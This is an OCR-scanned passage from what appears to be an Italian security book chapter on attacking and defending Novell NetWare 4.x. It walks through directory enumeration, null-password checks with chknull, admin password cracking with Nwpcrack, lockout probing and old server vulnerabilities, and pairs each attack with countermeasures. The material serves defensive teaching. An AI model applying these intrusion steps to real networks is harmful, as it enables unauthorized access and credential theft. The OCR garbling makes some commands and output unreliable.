tuttavia nlist può fare molto di più. Con nlist, infatti, è possibile visualizzare 

utenti, gruppi, server, code e volumi presenti nel sistema. E il programma che viene 

utilizzato principalmente per visualizzare gli utenti su un server NetWare e i gruppi 

di cui essi fanno parte. 

e nlistuser /d visualizza gli utenti, definiti nel server, con il formato prede- 
finito. 

e nlist groups /d visualizza i gruppi definiti nel server, nonché i nomi degli 
utenti che vi sono inclusi. 

nlist server /d visualizza i server NetWare definiti sulla rete. 
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e nlist /ot=* /dyn /d visualizza tutte le informazioni relative agli oggetti, 
come viene mostrato nella figura seguente. 


Ma CAWINNTA\System32\cmd.exe 


Value Type: Item 

pangin ito: Static 

Read Security: Any 

Write Security: Supervisor 


nlist /ot=" /dyn /d 


Value: 

3 53 63 61 6D 62 72 61 79 09 98 GB6 BG BO GG BA BA Scambray........ 
A819: DA HG AB BA HB BA BO DO € GG GA BA BA BA GA BO BA ..............., 
6920: 98 BA 08 HA HA BE BA HA GG 0 90 DA 04 GG BA BU................. 
99309: 80 DA 02 0A H8 GA BI BU @ HA GO 20 BA BA BA BA BA ................. 
9940: 99 BB 090 DA BA HA BA BHO DA GA DU BA HA dA BA GA ................ 
BI59: 89 99 08 GU HO HA HA BE BA Ha GA BA BO DO DO HO................. 
9960: 89 98 98 HA Gf GA BA HA BA AB GA HA GA 80 BA 0 ................ 
89970: 99 BH 98 BO BO GA HE BA BA 08 60 A DA SSIIOTTTO 

Property Name: PHONE_NUMBER 
Value Type: Item 
songue 243 Static 
Read Security: Any 
Write Security: Supervisor 
Value: 

= 36 35 30 2D 35 35 35 2D 31 32 31 32 00 BO 00 BO 650-555-1212.... 
9019: 88 B9 HA BB 00 BA BE 00 88 GG BA GA BA DA BA DA ................ 
9220: 48 80 GA BE HA 0A 88 A8 80 BA BA G6 G60 Go H8 00 ................ 
9930: 80 00 00 GA 09 B8 HA 8 BO GO GA BO BA B60 DA ................ 

= C = Continuous Esc = Cancel. 


nlist è molto utile quando è necessario recuperare le diverse proprietà degli og- 
getti, come per esempio il titolo, il nome reale, il numero di telefono ecc. 


® 


Nella cartella SYS:PUBLIC dell’installazione di NetWare 4.x è possibile trovare un 
piccolo programma di utilità, chiamato cx (Change Context). cx è in grado di visua- 
lizzare le informazioni dell'albero NDS 0 di qualunque parte di esso. Questo stru- 
mento è particolarmente utile se avete la necessità di ricercare oggetti specifici 
all’interno dell'albero stesso. Per esempio, quando un pirata scopre la password re- 
lativa all'utente ECULP in un particolare server, può utilizzare cx per effettuare la 
scansione dell'intero albero NDS e scoprire quali altri server siano accessibili dallo 
stesso utente. Di seguito potete vedere un piccolo esempio di che cosa è possibile 
fare con cx. Per modificare il vostro contesto corrente e trasformarlo in root, digitate 
la stringa seguente: 


CK (n 


Per modificare il vostro contesto corrente e risalire di un livello nell'albero, digitate 
la stringa seguente: 


cx 
Per specificare un contesto specifico digitatene il nome: 
cx .engineering.newyork.hss 
[a Non sottovalutate l'importanza del punto davanti al nome del file, 


Ro nell'esempio appena visto: specifica che il percorso è relativo alla directory 
di root. 
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Per visualizzare tutti gli oggetti contenitore all’interno del contesto corrente o di li- 
vello inferiore, digitate la stringa seguente: 


cx /t 


Per visualizzare invece tutti gli oggetti all’interno del contesto corrente o di livello 
inferiore, digitate la stringa seguente: 


cx /t /a 

Per visualizzare tutti gli oggetti di un contesto specifico, digitate la stringa seguente: 
cx .engineering.newyork.hss /t /a 

Potete anche visualizzare tutti gli oggetti a partire da root: 

cx /t /a /r 

Se desiderate avere una mappa dell’intero albero NDS, dovete semplicemente utiliz- 


zare il comando cx /t /a /r per enumerare ogni contenitore, come mostrato nella 
Figura 6.2. 


È COWINN T\System32\cmd exe 
Directory Services Mapping »** 


[Root] 
i ‘Hss 


C:\novell\public> 


Figura 6.2 


Con cx disponibile l'hacker potrà conoscere qualunque aspetto o configurazione 
dell'infrastruttura di NetWare. 
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E» Sc riscontrate qualche problema nel funzionamento del comando cx (per 
Rg esempio vi viene restituito l'errore CX-4.20-240), dovrete probabilmente uti- 
lizzare il browser On-Site, che analizzeremo nel prossimo paragrafo. L'erro- 
re a volte può capitare, soprattutto se la connessione alla rete NetWare av- 
viene attraverso la linea telefonica. Gli errori ricevuti sono del tipo seguente: 


CX-4.20-240: The context you want to change to does not exist. 
You tried to change to: 

ACME 

Your context will be left unchanged as: 

[Root] 


1® On-Site Admin 


Come avete già visto nel Capitolo 3, Novell consente a qualunque utente di accede- 
re all'albero NDS in modalità predefinita. Le informazioni che possono essere rac- 
colte dalla visualizzazione dell’albero sono di enorme importanza per qualunque 
hacker: in questo modo l'hacker si può fare un’idea della struttura grafica della rete, 
comprese le OU (Organizational Units, unità organizzative), i server, gli utenti, i 
gruppi, le stampanti ecc. 

On-Site consente di ottenere la visualizzazione grafica degli oggetti contenuti 
nell'albero NDS, una sorta di equivalente grafico delle informazioni fornite da cx. Il 
programma visualizzerà l’alberatura di ogni percorso, contenitore e oggetto, come 
mostrato nella Figura 6.3. 


& abirchard 

® Accounting(@) 
è Admin 

®© Custadial Services(») 
A deoane 

& eculp 

& ehammond 
88 Engineering 
& sstein 

dà gkurtz 

28 Human Resources 
 jbenson 

& jgoldberg 

A jhanley 

& jhomey 

& jscambray 

è jsmith 
 jsymoens 

3 Marketing 

a mdolphin 

88 MIS 

al 


Figura 6.3 

Per visualizzare l'alberatura NDS disponibile con On-Site, selezionate semplicemente il pulsante Tree 
nella barra dove si trovano i pulsanti. Non dimenticatevi che sarà necessario creare un attachment 
iniziale al server prima di poter scorrere l'alberatura. 
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Contromisure alla scansione dell’alberatura NDS 


Sono disponibili due diverse tipologie di difesa, per correggere l'impostazione pre- 
definita di accesso pubblico a NDS in NetWare 4.x e versioni successive, La prima è 
stata illustrata nel Capitolo 3. Quando la possibilità di effettuare ricerche viene limi- 
tata al solo oggetto pubblico, verificate che ciò non abbia effetto sulla capacità 
dell’utente di accedere alla rete, controllando in particolar modo l'assegnazione dei 
nomi dei drive. Molti utenti ricevono il proprio codice di mappatura sul server, 
all’interno degli script di login preparati dagli amministratori: poiché tali codici uti- 
lizzano i nomi dei server, per localizzare il server all’interno dell'albero NDS si uti- 
lizza il protocollo SLP (Service Location Protocol). Per eliminare la possibilità di ef- 
fettuare ricerche al di fuori dell'oggetto pubblico potete modificare gli script di login 
in modo che in essi figurino gli indirizzi IP dei server, anziché i loro nomi, oppure 
potete impostare manualmente le entry del DNS relative ai server presenti in rete. 


Aprire porte non bloccate 


Una volta che gli hacker hanno ottenuto le informazioni relative alla vostra rete, co- 
minceranno ad abbassare qualche maniglia alla ricerca di porte aperte. Il miglior 
modo per farlo consiste nel ricercare qualche password: tutti i nomi utente sono a 
disposizione, per cui è sufficiente indovinare qualche password e il gioco è fatto. 


® chknull 


Diffusione: 9 
Semplicità: 10 
Impatto: Ss 
Fattore di rischio: 8 


chknull è un programma di utilità che riveste la massima importanza per l’hacker (0 
per l'amministratore) che desidera introdursi in una rete NetWare. Questo strumento, 
che si basa sull’accesso al bindery, è in grado di funzionare sia sui server NetWare 3.x 
sia sui server NetWare 4.x, se il contesto bindery è abilitato. Questo programma è ine- 
stimabile per gli hacker e gli amministratori, poiché è in grado di stabilire se esistono 
nomi utente che hanno una password nulla o di facile individuazione. Ricordate che 
NetWare non richiede obbligatoriamente la scelta della password quando viene crea- 
to un utente (a meno che non venga utilizzato un template utente). Il risultato è che 
di solito vengono creati molti utenti cui è assegnata una password vuota; questi nomi 
utente a volte vengono dimenticati e forniscono porte di sicuro accesso ai sistemi 
NetWare per eventuali hacker. Ad aggravare il problema c'è il fatto che molti utenti 
prediligono la praticità alla sicurezza e scelgono password di facile memorizzazione. 
Il fenomeno è amplificato dal fatto che non vengono utilizzate politiche di sicurezza 
adeguate e non sono svolte azioni di sensibilizzazione nei confronti degli utenti. 
Potete utilizzare chknul1 per individuare l’esistenza di password nulle o di facile in- 
dividuazione sulla rete NetWare: 


Usage: chknull [-p] [-n] [-v] [wordlist...] 
-p : check username as password 
-n : don't check NULL password 
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-V : verbose output 
also checks words specified on the command line as password 


La caratteristica di chknull è che ciascuna ricerca di password nulla non viene regi- 
strata nel file di log come un tentativo di accesso al sistema fallito, cosa che invece 
avverrebbe se si tentasse l'autenticazione manuale. 

chknull può ricercare password vuote o uguali al nome utente con grande rapidità. 
Come potete vedere nella figura seguente, esistono nel nostro esempio numerosi 
utenti non associati a una password. Esiste anche un utente, JBENSON, la cui pass- 
word è identica al nome utente (sempre JBENSON): in questo esempio il sistema 
NetWare non è stato configurato nel migliore dei modi. 


CAVWINNT\Syste 
C:\novell>chknull —p 
fb900001 9001 JSYMOENS HAS a NULL password 
BA8190901 6901 JUSMITH HAS a NULL password 
81010081 69001 RPAUL HAS a NULL password 
620109961 0001 JHANLEY HAS a NULL password 
83019001 B001 MMEADOUS HAS a NULL password 


EHAMMOND HAS a NULL ssword 
0001 JBENSON : JBENSON 
ECULP HAS a NULL password 
JHOMEY HAS a NULL password 
89019001 SBGGi1 TGOODY HAS a NULL password 
BaB166001 b00L1 JGOLDBERG HAS a NuLL password 
9b818801 bG601i ESTEIN HAS a NULL password 


C:iNnovell> 


L'ultima opzione di chknul1, che consente di specificare sulla linea di comando un 
elenco di password, non è molto affidabile e non dovrebbe essere utilizzata. 


mancato accesso al server, verificate l'impostazione Set Primary. Potete 


e Se si presentano problemi nell'utilizzo di chknull, come l'errore di 
eseguire questa verifica nella finestra NetWare Connections. 


DÌ Contromisure a chknull 


Le contromisure adottabili per impedire il funzionamento di chknull sono semplici, 

ma, in base alla tipologia della vostra installazione, potrebbero essere difficili da ap- 

plicare. Per impedire il funzionamento di chknull, è possibile utilizzare una qualsia- 
si delle tecniche elencate di seguito. 

e Rimuovete il contesto bindery dai vostri server NetWare. Modificate il file 
autoexec.ncf e rimuovete la riga SET BINDERY. Ricordate che questa modi- 
fica può impedire ai vecchi client NETX e VLM di connettersi alla rete: que- 
ste tipologie di client basano sul bindery la loro funzionalità di connessione. 
Stabilite e rafforzate la politica aziendale di selezione delle password. 
Modificate e utilizzate un template USER_TEMPLATE in modo da costringere 
la scelta di una password di almeno sei caratteri, 

Rimuovete la possibilità di consultare l'albero NDS (si veda il Capitolo 3). 
Attivate la funzionalità Ztrusion Detection (rilevazione delle intrusioni). 
Fate clic con il pulsante destro su ciascuna delle Organizational Unit e 
adottate la procedura elencata di seguito. 
1. Selezionate Details. 
2. Selezionate la scheda Intrusion Detection e attivate le caselle di control- 
lo Detect Intruders e Lock Account After Detection. Modificate i parame- 
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tri di riscontro delle intrusioni per ottenere quelle specificate nel para- 
grafo “Contromisure a Nwpcrack”, nel prosieguo del capitolo. 


o) Funzione Undo di NWGINA 


Diffusione: 1 
Semplicità: 7 
Impatto: 9 
Fattore di rischio: 6 


L’ingegneria sociale riveste un ruolo fondamentale in ogni attacco finalizzato all’ot- 
tenimento dell'accesso fisico alla workstation. Il programma NWGIA (NetWare 
Graphical Identification and Authentication) di NetWare si occupa di validare le 
informazioni di login dell’utente prima di avviare uno dei sistemi operativi Win- 
dows NT/2000/XP: durante l'installazione del Novell Client32, tale programma va a 
sovrascrivere la libreria dinamica standard GINA.DLL di Microsoft. Una caratteristica 
tipica, comune alle finestre di dialogo e ai campi di testo delle interfacce grafiche, è 
la funzionalità “Undo” (Annulla), che permette di annullare l’ultima operazione ef- 
fettuata. Nelle finestre di dialogo delle GUI dei sistemi Win32 basati sulle API, la 
pressione della combinazione di tasti CTRL-Z all'interno di un campo di testo annul- 
la la modifica appena effettuata e, anche nel caso in cui fosse stato cancellato l’inte- 
ro contenuto del campo, ripristina il suo precedente contenuto. 

È possibile, anche se poco probabile, che un hacker riesca a distrarre un utente pro- 
prio nel momento in cui sta accedendo al server, quando ha già digitato la pas- 
sword ma subito prima che abbia premuto il tasto YNV/O, per esempio facendolo 
chiamare da qualcuno in un’altra stanza. A questo punto, se l’hacker ha un po' di 
fortuna, l'utente cancellerà la propria password digitando CTRL-Z e lascerà la pro- 
pria postazione: a questo punto la combinazione CTRL-Z riporterà nel campo di te- 
sto la password dell’utente, permettendo all’hacker l’accesso al sistema con l'identi- 
tà del malcapitato utente. Come si è già detto: è improbabile, ma possibile. 


© Contromisura allo sfruttamento 
della funzione Undo di NWGINA 


L'unica soluzione immediata consiste nel ripristinare prontamente la vecchia GI- 
NA.DLL di Microsoft, che (correttamente) vieta l’utilizzo della combinazione di tasti 
CTRL-Z per annullare gli input di testo. Novell ha già preparato la patch per questo 
difetto del programma. 


Scansioni dopo l’autenticazione 


Adesso avete scoperto quante informazioni possono essere estratte dai vostri server. 
Vi sentite già agitati? Dopo aver autenticato il suo accesso, il nostro hacker è in gra- 
do di ottenere altre informazioni aggiuntive dai sistemi. 

Una volta raccolta una collezione di nomi utente e di password associate utilizzan- 
do chknu11, l’hacker tenterà di autenticare il suo accesso al sistema con il program- 
ma DOS login.exe, On-Site, oppure con il programma di login Client32. Una volta 
autenticato dal sistema, sarà in grado di ottenere altre informazioni, utilizzando il 
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programma On-Site già presentato e due nuovi programmi di utilità: userlist e 
NDS Snoop. 


® userlist /a 


Diffusione: 9 
Semplicità: 10 
Impatto: 4 
Fattore di rischio: 8 


Il programma userlist non è in grado di funzionare se il client è connesso con un 
semplice attachment. L'utente, infatti, deve prima utilizzare un nome e una pass- 
word validi per farsi riconoscere dal sistema (magari ottenuti con chknul1), In se- 
guito userlist, mostrato nella figura seguente, è simile a On-Site ma dispone di 
un'interfaccia a riga di comando che gli consente di essere utilizzato all’interno di 


uno script. 


Ma C-KWINNT\Spstem32\cmd exe 
C:innovell>userlist /a 


User Information for Server SECRET 
Connection User Name Network Node Address Login Tine 


1 SEGRET .HSS [36FCC65D] 


I 1) 4-04-199? 2:59? pm 
2 * GKURTZ [221E6E0F] [ 861CD947] 4-04-1999 4:44 pm 
3 SECRET .HSS [36FCC65D] [ 1] 44-03-1999 1:59 pm 
4 ADMIN (A66C5BB6] [ 60089A89D41 4-63-1999 9:04 am 
5 ADMIN [A66C5BB6] [ 60089A89D4] 4-03-1999 9:04 am 


(C:\novell> 


Le informazioni presentate da userlist (il nome utente, l'indirizzo di rete e di no- 
do, il tempo di connessione) sono preziosissime per i successivi tentativi di accesso 
alla rete. 


® On-Site Admin 


Dopo esservi autenticati con successo a un server NetWare, potete utilizzare On- 
Site per visualizzare tutte le connessioni in corso. Selezionate semplicemente il ser- 
ver desiderato con il cursore del mouse e fate clic sul pulsante Ana/yze. Otterrete 
tutte le informazioni di base relative ai volumi e alle connessioni attive, come mo- 
strato nella Figura 6.4. 

Dopo esservi autenticati, On-Site consente di visualizzare tutte le connessioni 
NetWare su qualunque server accessibile alla rete. Queste informazioni sono molto 
importanti e aiuteranno l’intruso a ottenere l’accesso come amministratore di siste- 
ma, come vedremo in seguito. 


® NDS Snoop 


Con NDS Snoop potete andare più o meno lontano, secondo che lo sappiate usare 
al meglio o meno. Una volta autenticati, potete utilizzare questa applicazione per 
visualizzare in modalità grafica tutti gli oggetti e le relative proprietà (in modo simi- 
le al comando nlist /ot=* /dyn /d visto in precedenza). Vengono anche incluse le 
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ST On-Site Admin - Novell Developer Support 


i SECRET. 


‘Servers | VolsAROs colo “ila 


Connections _ Name © Node è Connection Information 
LoginiD. «—SECRETHSS 


Connection# 1 

200000000001 ù n 

0080089AS9D4 Login Time - 4\4A\99 14:59:5 

0060089A89D4 Network Address. 36FCC6SD 

000086100947 Node Address. 0000NON00N01:A0C4 | 

Q00000000001 7 È ] m 
Connection Type. Unknown 
Uses License —Unknown 
Files Locked Unknown 
Records Locked Unknown 
Bytes Read Unknown 
Bytes Written Unknown 


Total e Resuneta. Unknown — 


| Message 


[1 Volumes (6 connections. 
Figura 6.4 
L'informazione di connessione offerta con On-Site risulterà utile per accedere ad Admin. 


preziose informazioni Equivalent to Me che indicano gli utenti con autorizzazioni 
amministrative. 

Nella Figura 6.5 potete osservare la finestra di dialogo di NDS Snoop, in grado di vi- 
sualizzare informazioni vitali dell’alberatura NDS, che include Last Login Time (ulti- 
ma ora di accesso al sistema) e Equivalent to Me (l’elenco degli utenti con autorizza- 
zioni di amministrazione), una vera manna per gli hacker. 


O Rilevazione di Intruder Lockout 


Diffusione: 6 
Semplicità: 9 
Impatto: 6 
Fattore di rischio: 7 


Intruder Lockout (blocco degli intrusi) è una funzionalità di NetWare che consente il con- 
gelamento temporaneo dei nomi utente che tentano di autenticarsi senza successo per 
un determinato numero di volte. Essa, comunque, non è attiva in modalità predefinita. 

Questa funzionalità di NetWare è di grandissima importanza nel prevenire la possi- 
bilità di accessi indesiderati e dovrebbe essere sempre in funzione. Quando attivate 
il blocco degli utenti, come mostrato nella Figura 6.6, assicuratevi di modificare 
l'impostazione per tutti gli oggetti contenitore che svolgono le funzioni di autentica- 
zione degli utenti. 
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de NDS Snoop 
Browser | Schema Viewer | Schema Manager | 


Current Tree: HSS 

Objects: 

=. 5g HSS 
+ abirchard 
+ 8 Accounting 


Last Login Time 
Login Intruder Address 
A 1 nin Time zl 


Object Type: User 


isymoens.HSS 


[E SanFrancisco 


Suntax: SYN_DIST_NAME 


Selected Object: Admin 


Figura 6.5 


Server: SECRET 


Con NDS Snoop è possibile visualizzare i dettagli di ciascun oggetto, 
talvolta anche le informazioni su chi è equivalente a Admin. 


EB] Organization : HSS 


Figura 6.6 


Senza l'aiuto di Intruder Lockout non sarà mai possibile individuare 
chi ha Invaso il vostro sistema. 
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Una volta che un hacker ha identificato un nome utente specifico per eseguire l'at- 
tacco, cercherà di stabilire se è attiva la funzionalità di blocco dell’utente. Se così av- 
viene, i tentativi di accesso resteranno, per così dire, nei limiti di non intercettazione 
radar. Sarete sorpresi nello scoprire quanti amministratori di sistema non utilizzano 
la funzionalità Intruder Lockout, per mancanza di informazioni, per sottovalutazio- 
ne dei rischi o, semplicemente, perché ci possono essere molti altri impegni riguar- 
danti l'amministrazione. Di seguito viene illustrata una tecnica che risulterà utile per 
scoprire se è stata attivata questa funzionalità. 

Con la finestra di autenticazione Client32, cercate ripetutamente di eseguire il login 
utilizzando un nome utente valido. È molto probabile che utilizzerete la password 
errata. Il messaggio di errore sarà il seguente. 


NetWare Security Message 


The system could not lag you into the network. 
Make sure your name and connection information are comect, then type your password again. 


Saprete che il nome utente è stato bloccato quando il messaggio di errore, che ve- 
drete comparire, sarà uguale a quello mostrato nella figura seguente. 


{NetWare Security Message 


mi 


[ca 


La console di sistema con molta probabilità visualizzerà il messaggio seguente: 


4-08-99  4:29:28 pm: DS-5.73-32 

Intruder lock-out on account estein.HSS [221E6E0F:0000861CD947] 
4-08-99  4:35:19 pm: DS-5.73-32 

Intruder lock-out on account tgoody.HSS [221EG6E0F:0000861CD947] 


Dopo circa venti tentativi di accesso falliti senza ottenere il secondo tipo di messag- 
gio, potete essere praticamente sicuri che la funzionalità di Intruder Lockout non è 
stata attivata. 


Contromisure per la rilevazione di Intruder Lockout 


Attualmente non siamo a conoscenza di alcuna tecnica che consenta di evitare 
questa spiacevole funzionalità. Per quanto ne sappiamo, non è possibile modifi- 
care i messaggi di sistema predefiniti di Novell NetWare, relativi al blocco del 
nome utente. La precauzione migliore che potete adottare consiste nel controllare 
diligentemente la console del server. Assicuratevi di approfondire tutti i casi di 
blocco cronico di nomi utente, senza trascurare alcun fatto, per quanto irrilevante 
possa sembrare. 
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Come si diventa amministratore 


Come abbiamo dimostrato in precedenza, in molti casi è quasi banale ottenere le 
credenziali a livello di semplice utente della rete: è sufficiente utilizzare chknull 
per stabilire a quali nomi utente è assegnata una password nulla o di semplice indi- 
viduazione. Il passaggio successivo per la maggior parte degli hacker consiste nel 
cercare di ottenere la qualifica di utente amministratore. Esistono due metodi fonda- 
mentali che consentono di ottenere credenziali amministrative elencate di seguito: 


e rubare informazioni al server (metodo tradizionale); 
e attacchi di tipo NCP spoof. 


® Furto di informazioni 


Diffusione: 9 
Semplicità: 9 
Impatto: 8 
Fattore di rischio: 9 


Dopo essersi autenticati, la maggior parte degli hacker si limiterà a prendere infor- 
mazioni qua e là, se non addirittura a eseguire un vero e proprio furto. È proprio 
così: l’hacker accederà a quanti più server possibile, alla ricerca d'informazioni e 
password scritte in chiaro da qualche utente pigro o sconsiderato. Questo genere di 
comportamento è molto più diffuso di quanto voi non pensiate. 

Il furto d'informazioni da parte degli hacker (in inglese pillaging) è un po’ come la 
magia nera ed è particolarmente difficile da dimostrare. Quando operate in tal sen- 
so, infatti, il consiglio migliore è andare semplicemente alla ricerca di qualunque in- 
dizio all’interno di ciascun file disponibile. Potreste trovare la password di un ammi- 
nistratore scritta da qualche parte o accedere alla root del volume SYS utilizzando il 
comando map nel modo seguente: 


map n secret/sys:\ 


oppure con On-Site. Andate a vedere dentro a ciascuna directory che trovate, in 
particolare all’interno di quelle elencate di seguito. 


SYS:SYSTEM 


e SYS:ETC 

e SYS:HOME 
e SYS:LOGIN 
e SYS:MAIL 


e SYS:PUBLIC 


L'utente utilizzato per accedere al sistema potrebbe non essere autorizzato alla vi- 
sualizzazione di tutte queste risorse, ma potreste anche essere fortunati. Le directory 
SYSTEM e ETC sono particolarmente importanti, poiché contengono la maggior 
parte delle informazioni di configurazione del server. Queste directory dovrebbero 
essere accessibili solamente agli utenti amministratori. 
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© Contromisure al furto di informazioni 


Per prevenire l’accesso alle informazioni contenute all’interno dei vostri server 
NetWare, potete adottare queste contromisure semplici e dirette. I suggerimenti 
elencati di seguito si basano su meccanismi di restrizione dell'accesso agli utenti. 
e Rafforzate i limiti di accesso a volumi, directory e file da parte dei vari uten- 
ti, utilizzando filer. 
è Rafforzate i limiti di accesso relativi a tutti gli oggetti NDS, compresi gli oggetti 
Organization, Organizational Units, server, utenti ecc., utilizzando Nwadamn3x. 


0 Nwpcrack 


Diffusione: 9 
Semplicità: 9 
Impatto: 10 
Fattore di rischio: 9 


Nwpcerack è un programma che esegue il crack delle password per i sistemi NetWa- 
re 4.x. Questo strumento permette all'hacker di eseguire un attacco basato su un 
elenco di termini specifici. Nel nostro esempio abbiamo scoperto un gruppo chia- 
mato Admins. Una volta che vi siete connessi come utente, avrete la possibilità di 
scoprire quali sono gli utenti equivalenti ad Admin, o semplicemente verificare qua- 
li utenti fanno parte dei gruppi di amministratori come Admins, MIS ecc. In questo 
modo abbiamo scoperto gli utenti DEOANE e JSIMOENS nel gruppo ADMINS: que- 
sti saranno gli utenti che cercheremo di attaccare per primi. 

Avviando Nwpcrack per l’utente DEOANE, abbiamo scoperto che la sua password 
è stata individuata, come mostrato nella figura seguente. A questo punto avremo a 
disposizione i privilegi di amministratore sul server e su qualsiasi oggetto accessibi- 
le da questo stesso utente. 


VWINNTASystem32\cmd.exe 


(C:NTools\Novell\NWPCRACK>nwpcrack deoane dict.txt 


ied password EHLLO 
| password HELLO 
ltried password WHATEVER 


ried password ROGUE 
he Password for User DEOANE is ROGUE 


Passwords Tried 
:NTools\Novell\NWPCRACK>_ 


litato Intruder Lockoui, perché potreste bloccare l’utente. Prima di testare 

Nwpcrack sull'utente Admin o su un amministratore, dovreste creare una 

copia di backup del nome utente, da utilizzare in seguito per i tentativi 
Fi d’intrusione. Questo tipo di inconveniente non è possibile all’interno di si- 
stemi Windows NT, dal momento che l’utente Administrator di Windows NT 
non viene bloccato automaticamente dal sistema. Ricordiamo che per otte- 
nere questa funzionalità è necessario utilizzare l’utility Passprop, disponi- 
bile insieme al Resource Kit di Windows NT. 


N Non tentate di utilizzare Nwpcrack sugli amministratori di sistema se è abi- 
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Quando viene innescato il blocco dell'utente mediante l'utilizzo di 
Nwpcrack, appare il messaggio tried password <password> con la stessa 
password ripetuta diverse volte. Questo significa che NetWare non sta 
più accettando i tentativi di connessione da parte di questo utente. A 
questo punto è necessario uscire da Nwpcrack con la combinazione di 
tasti Ctrl+C, visto che la console di sistema ha senza dubbio visualizzato 
il messaggio DS-5.73-32 Intruder lockout on account Admin. 


© Contromisure a Nwpcrack 


Per evitare attacchi sferrati con Nwpcerack potete adottare le contromisure riportate 

di seguito. 

e Rafforzate la politica di scelta delle password. Novell non è in grado di 
offrire una soluzione semplice o automatica per svolgere questa opera- 
zione. Gli amministratori dovrebbero rendere più complesse le pass- 
word mediante criteri di protezione più opportuni di quelli adottati da 
Microsoft, che con la libreria passfilt.dll della famiglia NT ha forzato 
l'utilizzo di numeri e metacaratteri (come !@#$%) al'interno delle pass- 
word. Alcune alternative potrebbero essere richiedere le password, spe- 
cificarne il numero di caratteri e non consentirne il riutilizzo. Il modo 
migliore per controllare la lunghezza della password consiste nell’utiliz- 
zo di USER _TEMPLATE. 

e  Attivate la funzione Intruder Detection e Intruder Lockout. Selezionate il 
contenitore (di solito Organizational Unit) e fate clic su Details. Selezionate 
il pulsante Intruder Lockout e specificate le opzioni di configurazione. Con- 
sigliamo di adottare i valori elencati di seguito. 


Detect Intruders Yes 
(Rileva intrusioni) 

Incorrect Login attempts E.) 
(numero di tentativi di login non validi) 

Intruder attempt reset interval (Days) 14 
(Intervallo di reset del contatore di tentativi: giorni) 

Intruder attempt reset interval (Hours) 0 


(Intervallo di reset del contatore di tentativi: ore) 


Intruder attempt reset interval (Minutes) 0 
(Intervallo di reset del contatore di tentativi: minuti) 


Lock Account After Detection Yes 
(Blocca l'utente al momento dell’intrusione) 


Intruder lockout reset interval (Days) 7 
(Intervallo di reset del blocco utente: giorni) 

Intruder lockout reset interval (Hours) 0 
(Intervallo di reset del blocco utente: ore) 

Intruder lockout reset interval (Minutes) 0 
(Intervallo di reset del blocco utente: minuti) 
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Vulnerabilità delle applicazioni 


Se parliamo in termini di protocollo TCP/IP, l'installazione standard di NetWare 
lascia solamente alcune porte aperte, tra cui Echo (porta 7) e Chargen (porta 
19), non molto per attaccare un server con successo (a parte la possibilità di ge- 
nerare il Denial of Service). Quando invece attivate i servizi Web, FTP, NFS e 
telnet, la vostra “motocicletta” si trasformerà improvvisamente in un bolide ro- 
boante, con le seguenti porte aperte e senzienti: 53, 80, 111, 888, 893, 897 1031 
e 8002. 

Proprio a causa di questi nuovi servizi e dell'accresciuta flessibilità, negli anni si 
sono accumulate una serie di vulnerabilità che possono essere sfruttate per ottenere 
l’accesso non autorizzato ai sistemi. 


T) NetWare Perl 


Diffusione: 6 
Semplicità: 8 
Impatto: 8 
Fattore di rischio: 7 


Il difetto originario è stato scoperto all’inizio del 1997, per cui se non avete un'in- 

stallazione di NetWare 4.x molto antica e non possedete IntraNetWare, potreste evi- 
tare questo pericolo. Il problema consisteva nel fatto che l’'hacker era in grado di 
eseguire script Perl da qualunque posizione all’interno del volume, incluse le di- 
rectory 0 le directory d’accesso come LOGIN e MAIL. 
Il rischio in questo caso è che possono essere eseguiti script Perl in grado di mostra- 
re nel browser file importanti, come per esempio autoexec.ncf o ldremote.nef, 
che in molti casi contengono la password reonsole. 


Contromisure per NetWare Perl 


Ta contromisura proposta per il bug NetWare Perl non rappresenta purtroppo una 
scelta vincente, perché consiste nel disabilitare il servizio o nell’aggiornare NetWare 
a una versione più recente. Le due soluzioni alternative sono elencate di seguito. 


è Dalla console di sistema avviate il comando unload perl. 


@ Aggiornate il Web Server NetWare alla versione 3.0. Potete scaricare l’ultima 
versione disponibile dal sito http://www. support.novell.com. 


6 
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IntraNetWare. La configurazione predefinita del servizio fornisce agli utenti ano- 
mi l'autorizzazione di accesso File Scan sulla directory SYS:ETC. Questa directory 
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ospita il file netinfo.cfg e altri importanti file di configurazione. Per verificare se il 
vostro sistema è vulnerabile applicate la procedura elencata di seguito. 


1. Con il browser Web accedete all’URL del server NetWare: 


ftp://ftp.server.com/ 


i» 


Se vi viene dato l’accesso come utente anonimo, cercate di spostarvi all’in- 
terno delle directory fino a SYS:ETC. Se riuscite a vedere i file all'interno di 
SYS:ETC, allora siete sicuramente vulnerabili all'attacco. 


© Contromisure per NetWare FTP 


Le contromisure per la vulnerabilità a NetWare FTP sono simili a quelle adottate per 
Perl: disabilitare il servizio oppure aggiornare il software. 
e Aggiornate il servizio fipserv.nlm all'ultima versione. Potete scaricare il file 

dal sito http://www. support.novell.com. 

Disabilitate il servizio FTP. 

Rimuovete il servizio FTP utilizzando unicon.nIm. 


= La versione del servizio fipserv.nlm presente in Novell NetWare 4.11 non 
Rg consente l’accesso anonimo in modalità predefinita. 


0) Buffer overflow di DHCP e FTP su NetWare 
Diffusione: 
Semplicità: 
Impatto: 


yo % x 


Fattore di rischio: 


Come conseguenza della vulnerabilità appena illustrata sopra, nel giugno 2002 i 
servizi FTP e DHCP su NetWare sono stati oggetto di numerosi attacchi di tipo buf- 
fer overflow. Sebbene DHCP sia raramente interfacciato direttamente con Internet, 
possono comunque essere lanciati attacchi interni. 

Un hacker può scegliere di inviare richieste DHCP non standard e di grandi dimen- 
sioni che obbligheranno il server NetWare a interrompere le risposte o ne causeran- 
no il blocco, per risolvere il quale si renderà necessario riavviare la macchina. Il ser- 
ver FTP viene messo in difficoltà quando in luogo del nome utente si inseriscono 
lunghe stringhe di testo: questa situazione manda il server FTP in stato di ABEND 
(cioè, in crash), per risolvere il quale e riacquistare tutte le funzionalità sarà neces- 
sario riavviare il server. 


© Contromisura al buffer overflow 
di DHCP e FTP su NetWare 


L'unico rimedio è applicare la patch fornita da Novell nel luglio 2002, scaricabile 
all'indirizzo Web http://support.novell.com/servlet/tidfinder/2962999. 
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® NetWare Web Server 


Diffusione: 6 
Semplicità: 7 
Impatto: 9 
Fattore di rischio: 7 


L'attacco del server Web di NetWare è stato scoperto nel 1996. Le versioni più antiche 
del server Web di NetWare 4.x non controllavano i parametri che venivano passati 
agli script Basic convert.bas. Per questo motivo era possibile accedere con facilità ai 
file presenti sul server, compresi i file autoexec.ncf, ldremote.ncf e netinfo.cfg. 
I passaggi seguenti illustrano un metodo che vi consente di verificare se siete vulne- 
rabili a questo tipo di attacco. 
